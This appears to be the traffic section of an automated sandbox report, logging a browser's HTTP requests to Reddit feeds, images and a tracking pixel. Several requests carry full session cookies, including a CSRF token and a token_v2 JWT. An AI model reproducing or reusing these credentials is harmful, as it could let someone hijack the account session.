Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344536658.Z0FBQUFBQm9COWdZVC16dG9abUh2cHV1bHJhOUVralBkaVUwUXUtSWcyZG80S0xERWRGYzlYUFEwZE5zTUtVeXNfYmxTaTR6dER0YlZHUGFidjdfMHFFZk1UTnFoZUR3a3FXTEQxSU1nZjdWeW5fREs3dFRQQmtwNnpiVG9oU
Source: global trafficHTTP traffic detected: GET /i.gif?za=pivK4e_bTj6r7quMXmq1Mqyf7J_f3AcE6rswCosMsot5GeXS7fxjYqLfjIMHRd0LURvkN02-AI9K8IO62sK3t9UUu5RnLZHUlLzHEKhuTuD4_tJaGvcqkzyJkCs4IGayNyLgsS7GuWDzQiWJqIn0uo_xpvpjY5kBkiGnjHK56G7TKmhlK11Qw8_99hENn_fmUjex3ODHNguCy2yBq18Bapxi1uzOsh3cC-eIZmPZfLU6SYbPSc9C&zp=cAHvjBuFx2hE-YA95JKxsyDBfQCKThlXz-_d79P85U31eCt1ohA5v97-QTpS07XUf0PPJSVWQmae3v_izRKv_BIjpsMLV46fwqjXCw1ekHnAcvB52BR3AJXx1Moukw&a=0&b=0&be=0&c=0&d=0&e=0&ea=0&eb=0&f=0&r=0&g=0&i=1745344522919&t=1745344522919&o=0&q=0&h=0&w=0&sh=1024&sw=1280 HTTP/1.1Host: alb.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344536658.Z0FBQUFBQm9COWdZVC16dG9abUh2cHV1bHJhOUVralBkaVUwUXUtSWcyZG80S0xERWRGYzlYUFEwZE5zTUtVeXNfYmxTaTR6dER0YlZHUGFidjdfMHFFZk1UTnFoZUR3a3FXTEQxSU1nZjdWeW5fREs3dFRQQmtwNnpiVG9oU3RWc2VBSDE5S2V4X1M
Source: global trafficHTTP traffic detected: GET /svc/shreddit/feeds/popular-feed?after=dDNfMWs0d21uaQ%3D%3D&distance=4&sort=HOT&adDistance=2&navigationSessionId=945dc28c-1e9e-440b-9a8f-36a8d573acf7&ad_posts_served=1&cursor=dDNfMWs0d21uaQ%3D%3D HTTP/1.1Host: www.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344536658.Z0FBQUFBQm9COWdZVC16dG9abUh2cHV1bHJhOUVralBkaVUwUXUtSWcyZG80S0xERWRGYzlYUFEwZE5zTUtVeXNfYmxTaTR6dER0YlZHUGFidjdfMHFFZk1UTnFoZUR3a3FXTEQxSU1nZjdWeW5fREs3dFRQQmtwNnpiVG9oU3RWc2VBSDE5S2V4X1M
Source: global trafficHTTP traffic detected: GET /m1lypa16y7we1/DASH_96.mp4 HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /you-can-tell-how-nervous-she-was-initially-v0-YnpvdjB4YXowZndlMUUgophkhLJnylzJ8sVyIcRak6o06zI0ZNUOcBcLH1GR.png?width=640&crop=smart&format=pjpg&auto=webp&s=33c8ae9116343c843ab2bc706b46d9b593bb2928 HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aio-for-demanding-to-be-paid-after-wearing-something-v0-p3d0wjur1bwe1.jpg?width=1080&crop=smart&auto=webp&s=709b446b98d66153e1035e0509f9a80443313559 HTTP/1.1Host: preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aio-for-demanding-to-be-paid-after-wearing-something-v0-55memi4s1bwe1.png?width=1080&crop=smart&auto=webp&s=9bdc32b850284ed51942f8e35b5dee715e7cec9e HTTP/1.1Host: preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /svc/shreddit/styling-overrides/?context=namespaced HTTP/1.1Host: www.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rdt=f141fda34bbc28d220dd95ca654729b5; edgebucket=A7pEG7LhumUcimytWF; loid=000000001nuyrg96hz.2.1745344514857.Z0FBQUFBQm9COWdDbEdFZW5DdHR6SXBESUs3MjdrYnZCMDh1bV90RnZISVRhSDluMlN1STFiQjFFUEFpN1BBMTJtQ2tuNmR2SEhPUDRNNmNnbGloeE5JbUh1T3NWM3VXdTJ1WVl3cVVCQ2FOeG5EUE1QTXZZaU1jLWhWeTJnU1B4eGJmVUJKVXNxTFE; csrf_token=bc2c05c73ac370d65940c9a0c8742cb4; token_v2=eyJhbGciOiJSUzI1NiIsImtpZCI6IlNIQTI1NjpzS3dsMnlsV0VtMjVmcXhwTU40cWY4MXE2OWFFdWFyMnpLMUdhVGxjdWNZIiwidHlwIjoiSldUIn0.eyJzdWIiOiJsb2lkIiwiZXhwIjoxNzQ1NDMwOTE0Ljg1NzU5MywiaWF0IjoxNzQ1MzQ0NTE0Ljg1NzU5MywianRpIjoiTFlUZ0dRY3cwWUV2aTBPY3lEQnY5Z3JqVnpvN2h3IiwiY2lkIjoiMFItV0FNaHVvby1NeVEiLCJsaWQiOiJ0Ml8xbnV5cmc5Nmh6IiwibGNhIjoxNzQ1MzQ0NTE0ODU3LCJzY3AiOiJlSnhra2RHT3REQUloZC1GYTVfZ2Y1VV9tMDF0Y1lhc0xRYW9rM243RFZvY2s3MDdjRDRwSFA5REtvcUZEQ1pYZ3FuQUJGZ1RyVERCUnVUOW5MbTNnMmlOZTh0WXNabkNCRm13RkRya21MR3NpUVFtZUpJYXl4c21vSUxOeUZ5dXRHTk5MVDBRSnFoY01yZUZIcGMyb2JrYmk1NmRHRlc1ckR5b3NWZmwwdGpHRkxZbnhqY2JxdzJwdUM2bk1rbkxRdmtzWHZUak45VzM5dm16X1NhMEo4T0txdW1CM2hsSkNHNHNmcGltM2Q5VGs1NnRDeGExOTNxUTJ1ZDYzSzU5MWl3ME83ZWY2X2xySXhtWFkyaC1KdnQzMXktaEE0ODhMelBxQUVhczRVY1pkbVFkX2xVSFVMbWdKR01KNHRNSTVNcmwyMzhKdG12VHY4YnRFejk4TS1LbU5feldETlJ6Q2VMUXBfSDFHd0FBX184UTFlVFIiLCJmbG8iOjF9.XL7oIg3MwKheG_ccxTL7Kp6WHBk4VVCLT3AdIZK0PL9rzXFg7esuRkQA3gxm6FqE_RO3OV2TEpCdGXucr_u_2AI3m0Q__HV4Fc74jpHiSc9SK61g2OU-d5gwNX7RsLZ44fYWYHs6U9lR6N-TyAdgC7GrAkPPtrvCs8qbDuzNfqOjoMhQSN_ccE9B_mv_jpdmy_iOOLyEg42MU0XZ_fe8oQFufFlemtk0Ildlc1PG3s-ldYjnw1CDYD-IseokcGbETMLViJnLjc_fQ4wfhJwSB8xzaQMoPX7eUu61t9nqwIZv6yun2ASiBTbc8Y7fVC1Qx-NVzBanvAvnWi9pgm3wtQ; csv=2; session_tracker=brgcmaqpjfinlpaqdm.0.1745344538191.Z0FBQUFBQm9COWdhN2Z4NHVERDU3bkNTWkp6dmtZaHVwNzFiUmIyM19rZjdOelFnbk1oUmZzbi1ITEowNTc2VTNFQXBJSG11NHF3dFVLUmFUaUV4OS1qbXRlOU1Zb3NfOEVLSWFUMUNxVW9EempaeWd6ZFF4R09BVmktNThIVTZBcVdPNkNSei1SRWc
Source: global trafficHTTP traffic detected: GET /i-think-pete-hegseths-kids-might-hate-him-v0-OTJnaHBodzk5YndlMd0hpW0lAgCzMB7MUI_XeP3rF9agic2tXSm1B1nV-B5B.png?format=pjpg&auto=webp&s=4f8ae360bb6a89be31082a5ee64bb0cf29a12baa HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /the-doors-to-late-pope-francis-apartments-have-been-sealed-v0-eW1lcWRicThsZHdlMfZRaVTbfdeKD8KMLOP5areSuNW1WAtKhBFVc40zLjBK.png?width=640&crop=smart&format=pjpg&auto=webp&s=17215cf6d0ae6998d3a6e3828afd6f6b3fadf084 HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /good-thing-he-got-it-on-video-v0-dWhybHptZWJrZHdlMdwCdYUZOd8D-U3HcFHkkw01u6aa6XAKlgKEkb9BkCQF.png?width=640&crop=smart&format=pjpg&auto=webp&s=345ae6c0bd1366c3032ddf5ffb3c49d597d08573 HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /someone-found-this-awesome-mini-world-inside-a-tree-while-v0-Y3oydXNrY2o5ZXdlMfix98AlLO_iyTaOJ2u1luds-G8NQwgaL5-12Qab8lUN.png?width=640&crop=smart&format=pjpg&auto=webp&s=7070f7b90d51708b582792227af4ae2a1ddcadc1 HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /you-can-tell-how-nervous-she-was-initially-v0-YnpvdjB4YXowZndlMUUgophkhLJnylzJ8sVyIcRak6o06zI0ZNUOcBcLH1GR.png?width=640&crop=smart&format=pjpg&auto=webp&s=33c8ae9116343c843ab2bc706b46d9b593bb2928 HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aio-for-demanding-to-be-paid-after-wearing-something-v0-55memi4s1bwe1.png?width=1080&crop=smart&auto=webp&s=9bdc32b850284ed51942f8e35b5dee715e7cec9e HTTP/1.1Host: preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aio-for-demanding-to-be-paid-after-wearing-something-v0-p3d0wjur1bwe1.jpg?width=1080&crop=smart&auto=webp&s=709b446b98d66153e1035e0509f9a80443313559 HTTP/1.1Host: preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /this-dude-flying-in-a-jet-powered-wingsuit-right-next-to-v0-dzh2aW00NHhjZHdlMX9ZHEjl_kA6jpIN7Jjh6YhexHlQWfYdTa5nVe2ZUGgD.png?width=640&crop=smart&format=pjpg&auto=webp&s=ac2101f1fa921252010609c06f16c41fec88323d HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /the-doors-to-late-pope-francis-apartments-have-been-sealed-v0-eW1lcWRicThsZHdlMfZRaVTbfdeKD8KMLOP5areSuNW1WAtKhBFVc40zLjBK.png?width=640&crop=smart&format=pjpg&auto=webp&s=17215cf6d0ae6998d3a6e3828afd6f6b3fadf084 HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /9ypx1kyfihid1_t5_2qh3l/News HTTP/1.1Host: emoji.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /good-thing-he-got-it-on-video-v0-dWhybHptZWJrZHdlMdwCdYUZOd8D-U3HcFHkkw01u6aa6XAKlgKEkb9BkCQF.png?width=640&crop=smart&format=pjpg&auto=webp&s=345ae6c0bd1366c3032ddf5ffb3c49d597d08573 HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i-think-pete-hegseths-kids-might-hate-him-v0-OTJnaHBodzk5YndlMd0hpW0lAgCzMB7MUI_XeP3rF9agic2tXSm1B1nV-B5B.png?format=pjpg&auto=webp&s=4f8ae360bb6a89be31082a5ee64bb0cf29a12baa HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
